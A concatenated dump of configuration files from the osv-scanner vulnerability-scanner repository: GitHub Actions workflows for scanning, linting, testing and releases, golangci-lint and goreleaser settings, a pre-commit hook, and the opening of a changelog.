applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
name: OSV-Scanner Scheduled Scan on: pull_request: branches: ["main", "v1", "mcp"] schedule: - cron: "12 12 * * 1" push: branches: ["main", "v1", "mcp"] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: scan-scheduled: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read if: ${{ github.event_name == 'push' || github.event_name == 'schedule' }} # If you want to copy this config, we highly suggest pinning this to a release rather than tracking the nightly branch, since a branch ref can change between runs. uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@nightly" scan-pr: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read if: ${{ github.event_name == 'pull_request' || github.event_name == 'merge_group' }} # If you want to copy this config, we highly suggest pinning this to a release rather than tracking the nightly branch, since a branch ref can change between runs. uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@nightly" ================================================ FILE: .github/workflows/prerelease-check.yml ================================================ name: Pre-release check on: workflow_dispatch: inputs: version: description: "The version tag to release, (e.g. 
v1.2.3)" required: true type: string commit: description: "The commit hash to release" required: true type: string # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: osv-scan: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read uses: google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@main with: # Only scan the top level go.mod file without recursively scanning directories since # this pipeline is about releasing the go module and binary scan-args: |- ./ links: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: tcort/github-action-markdown-link-check@e7c7a18363c842693fadde5d41a3bd3573a7a225 # v1.1.2 with: use-quiet-mode: "yes" base-branch: "main" format: permissions: contents: read # to fetch code (actions/checkout) name: prettier runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Run lint action uses: ./.github/workflows/format-action tidy: permissions: contents: read # to fetch code (actions/checkout) name: go mod tidy runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: go mod tidy -diff lint: permissions: contents: read # to fetch code (actions/checkout) name: golangci-lint runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: 
false ref: ${{ inputs.commit }} - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run lint action uses: ./.github/workflows/lint-action prepare_test_image_testdata: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/build_test_images.sh - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/*.tar retention-days: 1 tests: permissions: contents: read # to fetch code (actions/checkout) name: Run unit tests needs: - prepare_test_image_testdata strategy: fail-fast: false matrix: os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false ref: ${{ inputs.commit }} - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/ - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run test action uses: ./.github/workflows/test-action with: codecov_token: ${{ secrets.CODECOV_TOKEN }} generators: permissions: contents: read # to fetch code (actions/checkout) name: (re)generate code runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false ref: ${{ inputs.commit }} - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: 
go-version-file: "go.mod" check-latest: true - name: Run generators run: go generate ./... - run: | git diff --name-only \ | xargs -I '{}' bash -c \ 'echo "::error file={}::This needs to be regenerated by running \`go generate ./...\`" && false' release-helper: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest needs: - format - lint - tests - osv-scan steps: - name: Print Scripts env: OUTPUT: | git fetch upstream && git tag ${{ inputs.version }} ${{ inputs.commit }} && git push upstream ${{ inputs.version }} shell: bash run: | echo $OUTPUT ================================================ FILE: .github/workflows/renovate-validator.yml ================================================ name: Renovate Config Validator on: push: branches: [main, v2] paths: - "renovate.json" pull_request: branches: [main, v2] paths: - "renovate.json" # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: validate: runs-on: ubuntu-latest permissions: contents: read # to fetch code (actions/checkout) steps: - name: Checkout code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Nodes.js uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0 with: node-version: latest - name: Validate Renovate Config run: npx --yes --package renovate -- renovate-config-validator ================================================ FILE: .github/workflows/scorecards.yml ================================================ # This workflow uses actions that are not certified by GitHub. They are provided # by a third-party and are governed by separate terms of service, privacy # policy, and support documentation. name: Scorecards supply-chain security on: # For Branch-Protection check. Only the default branch is supported. 
See # https://github.com/ossf/scorecard/blob/main/docs/checks.md#branch-protection branch_protection_rule: # To guarantee Maintained check is occasionally updated. See # https://github.com/ossf/scorecard/blob/main/docs/checks.md#maintained schedule: - cron: "32 22 * * 6" push: branches: ["main"] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: analysis: name: Scorecards analysis runs-on: ubuntu-latest permissions: # Needed to upload the results to code-scanning dashboard. security-events: write # Needed to publish results and get a badge (see publish_results below). id-token: write # Uncomment the permissions below if installing in a private repository. # contents: read # actions: read steps: - name: "Checkout code" uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: "Run analysis" uses: ossf/scorecard-action@4eaacf0543bb3f2c246792bd56e8cdeffafb205a # v2.4.3 with: results_file: results.sarif results_format: sarif # (Optional) Read-only PAT token. Uncomment the `repo_token` line below if: # - you want to enable the Branch-Protection check on a *public* repository, or # - you are installing Scorecards on a *private* repository # To create the PAT, follow the steps in https://github.com/ossf/scorecard-action#authentication-with-pat. # repo_token: ${{ secrets.SCORECARD_READ_TOKEN }} # Public repositories: # - Publish results to OpenSSF REST API for easy access by consumers # - Allows the repository to include the Scorecard badge. # - See https://github.com/ossf/scorecard-action#publishing-results. # For private repositories: # - `publish_results` will always be set to `false`, regardless # of the value entered here. publish_results: true # Upload the results as artifacts (optional). Commenting out will disable uploads of run results in SARIF # format to the repository Actions tab. 
- name: "Upload artifact" uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: SARIF file path: results.sarif retention-days: 5 # Upload the results to GitHub's code scanning dashboard. - name: "Upload to code-scanning" uses: github/codeql-action/upload-sarif@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 with: sarif_file: results.sarif ================================================ FILE: .github/workflows/snapshots.yml ================================================ name: Snapshots on: schedule: - cron: "47 18 * * *" workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: update: permissions: contents: write # to fetch and commit code actions: write # to manually dispatch checks on the pull request pull-requests: write # Create pull requests runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: ./scripts/run_tests.sh || true env: TEST_ACCEPTANCE: true TEST_VCR_MODE: replaywithnewepisodes UPDATE_SNAPS: always - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0 with: token: ${{ secrets.PR_TOKEN_BOT }} title: "test: update snapshots" body: > The snapshots have changed, probably due to OSV advisories being changed. Please review the differences to make sure that they're expected! 
branch: "bot/update-snapshots" author: "osv-robot " commit-message: "test: update snapshots" ================================================ FILE: .github/workflows/staleness.yml ================================================ name: "Close stale issues and PRs" permissions: read-all on: schedule: - cron: "0 * * * *" jobs: stale: permissions: issues: write pull-requests: write runs-on: ubuntu-latest steps: - uses: actions/stale@b5d41d4e1d5dceea10e7104786b73624c18a190f # v10.2.0 with: days-before-stale: 60 days-before-close: 14 operations-per-run: 100 remove-stale-when-updated: true exempt-issue-labels: "good first issue,V2 Wishlist,backlog" exempt-all-assignees: true ignore-updates: false stale-issue-label: stale stale-issue-message: | This issue has not had any activity for 60 days and will be automatically closed in two weeks See https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md for how to contribute a PR if you're interested in helping out. stale-pr-label: stale stale-pr-message: | This pull request has not had any activity for 60 days and will be automatically closed in two weeks close-issue-label: "autoclosed" close-issue-message: | Automatically closing stale issue close-pr-label: "autoclosed" close-pr-message: | Automatically closing stale pull request ================================================ FILE: .github/workflows/test-action/action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and
# limitations under the License.

# Composite action: runs the repository's test script and uploads coverage.
name: test
description: "Runs go tests"

inputs:
  # Composite actions cannot read the `secrets` context themselves, so the
  # calling workflow passes the token in as an input.
  codecov_token:
    description: "Token for uploading coverage reports to Codecov"
    required: true

runs:
  using: composite
  steps:
    - name: Run go test
      shell: bash
      env:
        TEST_ACCEPTANCE: true
      run: ./scripts/run_tests.sh
    - name: Upload coverage to Codecov
      uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
      with:
        token: ${{ inputs.codecov_token }}
        # a failed upload fails the calling job instead of being ignored
        fail_ci_if_error: true
================================================
FILE: .github/workflows/title.yml
================================================
# Copyright 2024 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Checks the pull request title with the semantic-pull-request action.
name: Title

on:
  # `pull_request_target` is only required when editing PRs from forks.
  # With plain `pull_request`, runs for fork PRs get a read-only GITHUB_TOKEN
  # and no repository secrets.
  pull_request:
    types:
      - opened
      - edited
      - reopened

# the only scope granted to GITHUB_TOKEN in this workflow
permissions:
  pull-requests: read

jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: amannn/action-semantic-pull-request@48f256284bd46cdaab1048c3721360e808335d50 # v6.1.1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
================================================
FILE: .github/workflows/zizmor.yml
================================================
# Static analysis of the repository's GitHub Actions workflows with zizmor.
name: GitHub Actions Security Analysis with zizmor 🌈

on:
  pull_request:
    # NOTE(review): the repository tree also lists action definitions under
    # `actions/` (reporter and scanner). A pull request that only touches
    # those does not match this filter; confirm whether they should be added.
    paths: [".github/workflows/**"]
  push:
    branches: ["main"]

# no permissions by default; the job below grants what it needs
permissions: {}

jobs:
  zizmor:
    runs-on: ubuntu-latest
    permissions:
      # presumably needed to upload findings to code scanning; confirm
      # against the action's documentation
      security-events: write
      contents: read
      actions: read
    steps:
      - name: Checkout repository
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
        with:
          # keep the checkout token out of the local git config
          persist-credentials: false
      - name: Run zizmor 🌈
        uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2
================================================
FILE: .gitignore
================================================
.history/
.vscode/
.idea/
/dist/
/osv-scanner
/temp
/coverage.out
/coverage.html
*.tar
*.pprof
.go-version
node_modules
osv-scalibr-portal
# we don't want to check in this file as it's very very large
/internal/semantic/testdata/redhat-versions-generated.txt
================================================
FILE: .golangci-lint-version
================================================
v2.9
================================================
FILE: .golangci.yaml
================================================
version: "2" linters: default: all # prettier-ignore disable: - cyclop # - err113 # will re-add later (another-rex) - exhaustruct # overkill (g-rath) - forcetypeassert # too hard (g-rath) - funlen # - funcorder # - gochecknoglobals # disagree with, for non changing variables (another-rex) - gocognit # - goconst # not everything should be a constant - gocyclo # - godot # comments are fine without full stops (g-rath) - godox # to-do comments are fine (g-rath) - ireturn # disagree
with, sort of (g-rath) - lll # line length is hard (g-rath) - maintidx # - mnd # not every number is magic (g-rath) - nestif # - noinlineerr # - nonamedreturns # disagree with, for now (another-rex) - tagliatelle # we're parsing data from external sources (g-rath) - testpackage # will re-add later (another-rex) - varnamelen # maybe later (g-rath) - wrapcheck # too difficult, will re-add later (another-rex) - wsl # disagree with, for now (g-rath) - wsl_v5 # disagree with, for now (g-rath) settings: depguard: rules: regexp: files: - "!**/internal/cachedregexp/**" - "!**/internal/testutility/normalize.go" - "!**/pkg/osvscanner/exclude.go" deny: - pkg: regexp desc: Use github.com/google/osv-scanner/v2/internal/cachedregexp instead exhaustive: default-signifies-exhaustive: true forbidigo: forbid: - pattern: ^testing.T.Skip pkg: ^testing$ msg: go-snaps needs to know the test has been skipped, so use `testutility.Skip` instead - pattern: ^os.Getwd pkg: ^os$ msg: use `testutility.GetCurrentWorkingDirectory` analyze-types: true gocritic: disabled-checks: - ifElseChain govet: enable-all: true disable: - fieldalignment - shadow nlreturn: block-size: 2 revive: rules: - name: increment-decrement disabled: true - name: blank-imports disabled: false - name: context-as-argument disabled: false - name: context-keys-type disabled: false - name: dot-imports disabled: false - name: empty-block disabled: false - name: error-naming disabled: false - name: error-return disabled: false - name: error-strings disabled: false - name: errorf disabled: false - name: exported disabled: false arguments: # TODO: get these all enabled - "check-private-receivers" # - "check-public-interface" - "disable-checks-on-constants" - "disable-checks-on-functions" - "disable-checks-on-methods" - "disable-checks-on-types" - "disable-checks-on-variables" - name: import-alias-naming disabled: false - name: import-shadowing disabled: false - name: indent-error-flow disabled: false - name: package-comments
disabled: false - name: range disabled: false - name: receiver-naming disabled: false - name: redefines-builtin-id disabled: false - name: redundant-test-main-exit disabled: false - name: superfluous-else disabled: false - name: time-naming disabled: false - name: unexported-return disabled: false - name: unreachable-code disabled: false - name: unused-parameter disabled: false - name: use-any disabled: false - name: var-declaration disabled: false - name: var-naming disabled: false arguments: - [] # AllowList - [] # DenyList - - skip-package-name-checks: true exclusions: generated: lax presets: - common-false-positives - legacy - std-error-handling rules: - path: _test\.go linters: - dupl - path-except: _test\.go text: use `testutility.GetCurrentWorkingDirectory` paths: - internal/thirdparty/ - third_party$ - builtin$ - examples$ formatters: enable: - gofmt - goimports exclusions: generated: lax paths: - internal/thirdparty/ - third_party$ - builtin$ - examples$ issues: max-issues-per-linter: 0 max-same-issues: 0
================================================
FILE: .goreleaser-nightly.yml
================================================
# Nightly build: linux/amd64 binaries and `:nightly` container images only;
# no GitHub release and no changelog are produced (see the end of the file).
version: 2

before:
  hooks:
    - go mod tidy

builds:
  - main: ./cmd/osv-scanner/
    id: osv-scanner
    binary: osv-scanner
    env:
      # goreleaser does not work with CGO, it could also complicate
      # usage by users in CI/CD systems like Terraform Cloud where
      # they are unable to install libraries.
      - CGO_ENABLED=0
      - GO111MODULE=on
    # timestamp taken from the commit rather than the build machine clock,
    # which helps keep builds reproducible
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      # strips local filesystem paths from the compiled binary
      - -trimpath
    ldflags:
      # -s/-w drop the symbol table and DWARF debug data; the -X entries
      # stamp version, commit and date into the binary
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}.nightly"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      - linux
    goarch:
      - amd64
  - main: ./cmd/osv-scanner/
    id: osv-scanner-action
    binary: osv-scanner-action
    env:
      # goreleaser does not work with CGO, it could also complicate
      # usage by users in CI/CD systems like Terraform Cloud where
      # they are unable to install libraries.
      - CGO_ENABLED=0
      - GO111MODULE=on
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      - -trimpath
    ldflags:
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}.nightly_GHAction"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      - linux
    goarch:
      - amd64
  - main: ./cmd/osv-reporter/
    id: osv-reporter
    binary: osv-reporter
    env:
      # osv-reporter for github action
      - CGO_ENABLED=0
      - GO111MODULE=on
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      - -trimpath
    ldflags:
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      - linux
    goarch:
      - amd64

dockers:
  # Main osv-scanner
  - image_templates:
      - "ghcr.io/google/osv-scanner:nightly"
    dockerfile: goreleaser.dockerfile
    use: buildx
    build_flag_templates:
      # always try to fetch a fresh copy of the base image
      - "--pull"
      - "--label=org.opencontainers.image.title=osv-scanner"
      - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev"
      # NOTE(review): the action image below uses the SPDX identifier
      # `Apache-2.0` for this label, which is the form the OCI annotation is
      # defined to take; this entry spells the licence out instead.
      - "--label=org.opencontainers.image.licenses=Apache License 2.0"
      - "--label=org.opencontainers.image.created={{.Date}}"
      - "--label=org.opencontainers.image.name={{.ProjectName}}"
      - "--label=org.opencontainers.image.revision={{.FullCommit}}"
      - "--label=org.opencontainers.image.version={{.Version}}"
      - "--label=org.opencontainers.image.source={{.GitURL}}"
      - "--label=org.opencontainers.image.url={{.GitURL}}"
      - "--platform=linux/amd64"
  # Github Action
  - image_templates:
      - "ghcr.io/google/osv-scanner-action:nightly"
    dockerfile: goreleaser-action.dockerfile
    use: buildx
    extra_files:
      - exit_code_redirect.sh
    build_flag_templates:
      - "--pull"
      - "--label=org.opencontainers.image.title=osv-scanner-action"
      - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev"
      - "--label=org.opencontainers.image.licenses=Apache-2.0"
      - "--label=org.opencontainers.image.created={{.Date}}"
      - "--label=org.opencontainers.image.name={{.ProjectName}}"
      - "--label=org.opencontainers.image.revision={{.FullCommit}}"
      - "--label=org.opencontainers.image.version={{.Version}}"
      - "--label=org.opencontainers.image.source={{.GitURL}}"
      - "--label=org.opencontainers.image.url={{.GitURL}}"
      - "--platform=linux/amd64"
    goarch: amd64

release:
  disable: true

changelog:
  disable: true
================================================
FILE: .goreleaser.yml
================================================
# Tagged release build: cross-platform osv-scanner binaries, per-architecture
# container images joined into multi-arch manifests, a SHA-256 checksum file
# and a draft GitHub release.
version: 2

before:
  hooks:
    - go mod tidy

builds:
  - main: ./cmd/osv-scanner/
    id: osv-scanner
    binary: osv-scanner
    env:
      # goreleaser does not work with CGO, it could also complicate
      # usage by users in CI/CD systems like Terraform Cloud where
      # they are unable to install libraries.
      - CGO_ENABLED=0
      - GO111MODULE=on
    # timestamp taken from the commit rather than the build machine clock,
    # which helps keep builds reproducible
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      # strips local filesystem paths from the compiled binary
      - -trimpath
    ldflags:
      # -s/-w drop the symbol table and DWARF debug data; the -X entries
      # stamp version, commit and date into the binary
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      # Further testing before supporting freebsd
      # - freebsd
      - windows
      - linux
      - darwin
    goarch:
      - amd64
      # 32bit does not compile at the moment because of spdx dependency
      # - '386'
      # Further testing before supporting arm
      # - arm
      - arm64
  - main: ./cmd/osv-scanner/
    id: osv-scanner-action
    binary: osv-scanner-action
    env:
      # goreleaser does not work with CGO, it could also complicate
      # usage by users in CI/CD systems like Terraform Cloud where
      # they are unable to install libraries.
      - CGO_ENABLED=0
      - GO111MODULE=on
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      - -trimpath
    ldflags:
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}_GHAction"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      - linux
    goarch:
      - amd64
  - main: ./cmd/osv-reporter/
    id: osv-reporter
    binary: osv-reporter
    env:
      # osv-reporter for github action
      - CGO_ENABLED=0
      - GO111MODULE=on
    mod_timestamp: "{{ .CommitTimestamp }}"
    flags:
      - -trimpath
    ldflags:
      - "-s -w"
      - "-X github.com/google/osv-scanner/v2/internal/version.OSVVersion={{.Version}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.commit={{.Commit}}"
      - "-X github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd.date={{.CommitDate}}"
    goos:
      - linux
    goarch:
      - amd64

dockers:
  # Arch: amd64
  - image_templates:
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64"
    dockerfile: goreleaser.dockerfile
    use: buildx
    build_flag_templates:
      # always try to fetch a fresh copy of the base image
      - "--pull"
      - "--label=org.opencontainers.image.title=osv-scanner"
      - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev"
      # NOTE(review): the arm64 and action images below use the SPDX
      # identifier `Apache-2.0` for this label, which is the form the OCI
      # annotation is defined to take. The two halves of the multi-arch
      # manifest therefore carry different licence metadata.
      - "--label=org.opencontainers.image.licenses=Apache License 2.0"
      - "--label=org.opencontainers.image.created={{.Date}}"
      - "--label=org.opencontainers.image.name={{.ProjectName}}"
      - "--label=org.opencontainers.image.revision={{.FullCommit}}"
      - "--label=org.opencontainers.image.version={{.Version}}"
      - "--label=org.opencontainers.image.source={{.GitURL}}"
      - "--label=org.opencontainers.image.url={{.GitURL}}"
      - "--platform=linux/amd64"
  # Arch: arm64
  - image_templates:
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64"
    dockerfile: goreleaser.dockerfile
    use: buildx
    build_flag_templates:
      - "--pull"
      - "--label=org.opencontainers.image.title=osv-scanner"
      - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev"
      - "--label=org.opencontainers.image.licenses=Apache-2.0"
      - "--label=org.opencontainers.image.created={{.Date}}"
      - "--label=org.opencontainers.image.name={{.ProjectName}}"
      - "--label=org.opencontainers.image.revision={{.FullCommit}}"
      - "--label=org.opencontainers.image.version={{.Version}}"
      - "--label=org.opencontainers.image.source={{.GitURL}}"
      - "--label=org.opencontainers.image.url={{.GitURL}}"
      - "--platform=linux/arm64"
    goarch: arm64
  # Github Action
  - image_templates:
      - "ghcr.io/google/osv-scanner-action:{{ .Tag }}"
    dockerfile: goreleaser-action.dockerfile
    use: buildx
    extra_files:
      - exit_code_redirect.sh
    build_flag_templates:
      - "--pull"
      - "--label=org.opencontainers.image.title=osv-scanner-action"
      - "--label=org.opencontainers.image.description=Vulnerability scanner written in Go which uses the data provided by https://osv.dev"
      - "--label=org.opencontainers.image.licenses=Apache-2.0"
      - "--label=org.opencontainers.image.created={{.Date}}"
      - "--label=org.opencontainers.image.name={{.ProjectName}}"
      - "--label=org.opencontainers.image.revision={{.FullCommit}}"
      - "--label=org.opencontainers.image.version={{.Version}}"
      - "--label=org.opencontainers.image.source={{.GitURL}}"
      - "--label=org.opencontainers.image.url={{.GitURL}}"
      - "--platform=linux/amd64"
    goarch: amd64

docker_manifests:
  - name_template: "ghcr.io/google/osv-scanner:{{ .Tag }}"
    image_templates:
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64"
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64"
  # `latest` is re-pointed by every tagged release; consumers that need a
  # fixed image should reference a version tag or a digest instead
  - name_template: "ghcr.io/google/osv-scanner:latest"
    image_templates:
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64"
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64"
  - name_template: "ghcr.io/google/osv-scanner:stable"
    image_templates:
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-amd64"
      - "ghcr.io/google/osv-scanner:{{ .Tag }}-arm64"
    # pushed only when the STABLE environment variable equals `true`
    skip_push: "{{ ne .Env.STABLE `true` }}"

archives:
  # only the osv-scanner build is published as a release binary
  - formats: binary
    name_template: "{{ .Binary }}_{{ .Os }}_{{ .Arch }}"
    ids:
      - osv-scanner

# The checksum file lets a downloader detect a corrupted or swapped binary.
# NOTE(review): no signing step is configured in this file, so the checksum
# file is only as trustworthy as the channel it is fetched over; provenance or
# signatures, if any, would have to come from the release workflow (confirm).
checksum:
  name_template: "{{ .ProjectName }}_SHA256SUMS"
  algorithm: sha256

# releases are created as drafts and have to be published by a maintainer
release:
  draft: true

changelog:
  disable: false
================================================
FILE: .pre-commit-hooks.yaml
================================================
---
# pre-commit hook definition: runs a recursive source scan of the current
# directory on every commit, regardless of which files changed
- id: osv-scanner
  name: osv-scanner
  description: Scan the current working directory for vulnerable dependencies
  entry: osv-scanner
  always_run: true
  pass_filenames: false
  language: golang
  args:
    - "scan"
    - "source"
    - "--format=vertical"
    - "--recursive"
    - "--verbosity=error"
    - "."
================================================ FILE: .prettierignore ================================================ **/testdata/** /docs/vendor/** /docs/_sites/** /internal/output/html/*.gohtml ================================================ FILE: .prettierrc.json ================================================ { "$schema": "https://json.schemastore.org/prettierrc", "singleQuote": false, "proseWrap": "preserve", "endOfLine": "lf", "arrowParens": "avoid", "trailingComma": "none", "htmlWhitespaceSensitivity": "ignore" } ================================================ FILE: CHANGELOG.md ================================================ # v2.3.4 ### Features: - [Feature #2571](https://github.com/google/osv-scanner/pull/2571) Enable transitive scanning for Python requirements.txt files using the deps.dev API. - [Feature #2649](https://github.com/google/osv-scanner/pull/2649) Add ability to allow unsafe plugins, logging a warning when any unsafe plugin is enabled. ### Fixes: - [Bug #2630](https://github.com/google/osv-scanner/pull/2630) Improve startup performance on Windows Terminal by updating lipgloss. - [Bug #2599](https://github.com/google/osv-scanner/pull/2599) Ensure the package deprecation enricher respects the same configuration as other plugins. - [Bug #2600](https://github.com/google/osv-scanner/pull/2600) Ensure the Java extractor plugin for call analysis respects the same configuration as other plugins. ### Misc: - Update osv-scalibr from v0.4.2 to v0.4.5. Release notes: [v0.4.3](https://github.com/google/osv-scalibr/releases/tag/v0.4.3), [v0.4.4](https://github.com/google/osv-scalibr/releases/tag/v0.4.4), [v0.4.5](https://github.com/google/osv-scalibr/releases/tag/v0.4.5). # v2.3.3 ### Features: - [Feature #2458](https://github.com/google/osv-scanner/pull/2458) Add `--exclude` flag to skip paths during scanning. - [Feature #2477](https://github.com/google/osv-scanner/pull/2477) Add `pylock` extractor. 
